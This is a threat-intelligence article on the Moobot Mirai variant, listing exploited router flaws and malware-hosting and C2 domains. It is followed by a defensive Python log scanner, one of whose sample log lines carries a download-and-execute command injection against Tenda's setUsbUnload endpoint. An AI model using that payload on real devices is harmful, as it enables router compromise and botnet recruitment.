AT&T Alien Labs researchers have identified a new Mirai variant that is scanning the internet for uncommon security vulnerabilities on Tenda routers.
The variant, dubbed “Moobot”, has been seen delivered via a new malware hosting domain named “Cyberium”. Alien Labs revealed that it was noticed because of a peak in exploitation attempts against the Remote Code Execution vulnerability (CVE-2020-10987) on Tenda routers.
“This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it,” the AT&T blog stated.
Alien Labs researchers confirmed that the scan for Tenda routers lasted only a day; however, scanning activity continued for multiple weeks against the vulnerabilities listed below on other products.
- Port 80 and 8080: Axis SSI RCE.
- Port 34567: DVR scanner attempting default credentials for Sofia main video application.
- Port 37215: Huawei Home routers RCE Vulnerability (CVE-2017-17215).
- Port 52869: Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361).
“All of them appeared to be pulling their next iteration of the malware from the same malware hosting page: dns.cyberium[.]cc,” the Alien Labs blog stated.
The full list of subdomains/campaigns identified from this domain is:
- Snoopy.cyberium[.]cc: Around May 2020
- U.cyberium[.]cc: Around May 2020
- Gcc.cyberium[.]cc: Around June 2020
- Park.cyberium[.]cc: Around July 2020
- Hoon.cyberium[.]cc: Around July 2020
- Hh.cyberium[.]cc: Around September 2020
- Wo.cyberium[.]cc: Around October 2020
- Y.cyberium[.]cc: Around October 2020
- W.cyberium[.]cc: Around November 2020
- Ns.cyberium[.]cc: Around November 2020
- Tmp.cyberium[.]cc: Around December 2020
- Ftp.cyberium[.]cc: Around March 2021
- Dns.cyberium[.]cc: Around April 2021
- Ddns.cyberium[.]cc: Around April 2021
Other infrastructure controlled by the same actor has been used as Moobot command and control (C2) servers:
- Park.allcheesedout[.]cc: around September 2020
- Ratatouille.allcheesedout[.]cc: around September 2020
- Watchdog.allcheesedout[.]cc: around September 2020
- Bot.bigbots[.]cc: around February 2021
- Cnc.bigbots[.]cc: around February 2021
- Cnc1.bigbots[.]cc: around February 2021
- Cnc.fewbots[.]cc: created and up since February 2021
- Bot.fewbots[.]cc: created and up since February 2021
- Cnc.hardbotz[.]cc: created and up since March 2021
- Projectaliennet[.]cc: created and up since March 2021
- Life.zerobytes[.]cc: created in May 2021
Indicators of Compromise:

| Type | Value | Description |
|------|-------|-------------|
| MD5 | 555821a5f67d064362e8ce9a48b95d56 | Fbot with UPX |
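To turn the description above into something a defender can run, here is an added example (not code from the AT&T Alien Labs blog or from this site) that checks web-server access-log lines for the request pattern quoted earlier (a ‘setUsbUnload’ URL whose ‘deviceName’ parameter carries shell metacharacters, a download-and-execute chain, or a known hosting domain) and checks DNS-resolver log lines against the Cyberium, allcheesedout, bigbots, fewbots, hardbotz, projectaliennet and zerobytes domains listed in the article. The `/goform/` path prefix, both log layouts and every sample entry are constructed assumptions; the endpoint match keys only on ‘setUsbUnload’, as the article does.

```python
import re
from urllib.parse import unquote, urlsplit

# Domains named in the article, refanged from the [.] notation so they can be matched.
MOOBOT_DOMAINS = {
    "cyberium.cc", "allcheesedout.cc", "bigbots.cc", "fewbots.cc",
    "hardbotz.cc", "projectaliennet.cc", "zerobytes.cc",
}

# Markers of the "change directory, wget, chmod, execute" chain the article describes.
DOWNLOAD_EXEC = re.compile(r"\b(?:wget|curl|tftp|chmod)\b", re.IGNORECASE)
SHELL_META = re.compile(r"[;|&`$]")
URL_HOST = re.compile(r"https?://([^/\s:?#]+)", re.IGNORECASE)

# Request line of a common/combined-format access log entry (assumed layout).
ACCESS_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Constructed resolver log layout: "<timestamp> client=<ip> query=<name> type=<rr>".
DNS_RE = re.compile(r"client=(?P<ip>\S+) query=(?P<name>\S+)")


def refang(name: str) -> str:
    """Turn the article's defanged 'dns.cyberium[.]cc' into a matchable hostname."""
    return name.replace("[.]", ".").strip().rstrip(".").lower()


def is_moobot_domain(name: str) -> bool:
    """True if name is one of the listed domains or any subdomain of one."""
    name = refang(name)
    return any(name == d or name.endswith("." + d) for d in MOOBOT_DOMAINS)


def query_params(query: str) -> dict:
    """Split a query string on '&' only and percent-decode each value.
    Done by hand so a ';' inside a payload is kept, whatever the Python version."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote(key), []).append(unquote(value))
    return params


def classify_request(target: str) -> list:
    """Reasons a request target resembles the Tenda setUsbUnload exploit attempt;
    an empty list means the request does not touch that endpoint at all."""
    parts = urlsplit(target)
    if "setusbunload" not in parts.path.lower():
        return []
    reasons = ["setUsbUnload endpoint requested"]
    for value in query_params(parts.query).get("deviceName", []):
        if SHELL_META.search(value):
            reasons.append("shell metacharacters in deviceName")
        if DOWNLOAD_EXEC.search(value):
            reasons.append("download/execute commands in deviceName")
        for host in URL_HOST.findall(value):
            if is_moobot_domain(host):
                reasons.append(f"known Moobot hosting domain {host.lower()}")
    return reasons


def scan_access_log(lines) -> list:
    """One finding per line hitting the endpoint: 'high' when deviceName carries
    injection indicators, 'low' for a plain request to the vulnerable endpoint."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m.group("target"))
        if reasons:
            severity = "high" if len(reasons) > 1 else "low"
            findings.append({"ip": m.group("ip"), "severity": severity, "reasons": reasons})
    return findings


def scan_dns_log(lines) -> list:
    """(client, name) pairs whose query matches a listed Moobot domain."""
    return [(m.group("ip"), m.group("name")) for m in map(DNS_RE.search, lines)
            if m and is_moobot_domain(m.group("name"))]


# Constructed sample entries; the /goform/ prefix is an assumption, not from the article.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jun/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jun/2021:10:00:05 +0000] "GET /goform/setUsbUnload?deviceName=usb1 HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jun/2021:10:00:07 +0000] "GET /goform/setUsbUnload?deviceName='
    'a%3Bcd%20/tmp%3Bwget%20http://dns.cyberium.cc/b%3Bchmod%20777%20b%3B./b HTTP/1.1" 200 0',
]
SAMPLE_DNS_LOG = [
    "2021-06-01T10:00:08Z client=10.0.0.9 query=dns.cyberium.cc type=A",
    "2021-06-01T10:00:09Z client=10.0.0.5 query=example.com type=A",
    "2021-06-01T10:00:10Z client=10.0.0.12 query=cnc.fewbots.cc type=A",
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["severity"].upper(), f["ip"], "; ".join(f["reasons"]))
    for client, name in scan_dns_log(SAMPLE_DNS_LOG):
        print("DNS", client, "resolved known Moobot domain", name)
```

The values are percent-decoded before inspection because an access log records the request as sent, so `%3B` and `%20` hide the `;` and the `wget` that a naive substring match would look for. A request to the endpoint with a benign `deviceName` is still reported at low severity, since the endpoint itself is the vulnerable surface and should not be reachable from the internet.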